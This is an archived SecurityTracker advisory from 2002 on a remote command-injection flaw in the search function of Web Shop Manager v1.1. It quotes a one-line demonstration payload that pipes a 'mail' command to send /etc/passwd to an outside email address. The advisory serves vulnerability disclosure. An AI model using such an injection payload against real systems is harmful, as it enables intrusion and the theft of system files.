SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   Web Shop Manager Vendors:   Web Drive Limited
Web Shop Manager Input Validation Bug Lets Remote Users Execute Commands on the System
SecurityTracker Alert ID:  1004969
SecurityTracker URL:  http://securitytracker.com/id/1004969
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 6 2002
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1
Description:   An input filtering flaw was reported in Web Drive Limited's Web Shop Manager. A remote user can execute commands on the system.

SecurityBugware reported a remote command execution bug in Web Shop Manager v1.1. The software apparently does not filter certain characters from user-supplied input in the 'search' function. A remote user can supply a pipe character followed by system commands to execute commands on the system.

A demonstration exploit command to mail the password file on a Unix/Linux system to a remote user is provided:

|mail email@address < /etc/passwd

SecurityBugware credits Tacettin Karadeniz [tacettinkaradeniz at yahoo.com] with reporting the flaw.

Impact:   A remote user can execute arbitrary commands on the system with the privileges of the web server CGI process.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.webscriptworld.com/scripts/wsm.phtml (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  Web Shop Manager


http://www.securitybugware.org/Other/5603.html

SecurityBugware reported a remote command execution bug in Web Shop
Manager v1.1.

According to the report:

Tacettin Karadeniz [tacettinkaradeniz@yahoo.com] found that a remote
user can place some commands in the php-webshop-manager product's search
feature to cause the server to send arbitrary files (such as the
password file) to any e-mail address.  A demonstration exploit command
is provided:
        
   |mail CiLeK@xxxkaradenizeregli.net < /etc/passwd
        
The vendor's URL is:

http://www.webscriptworld.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC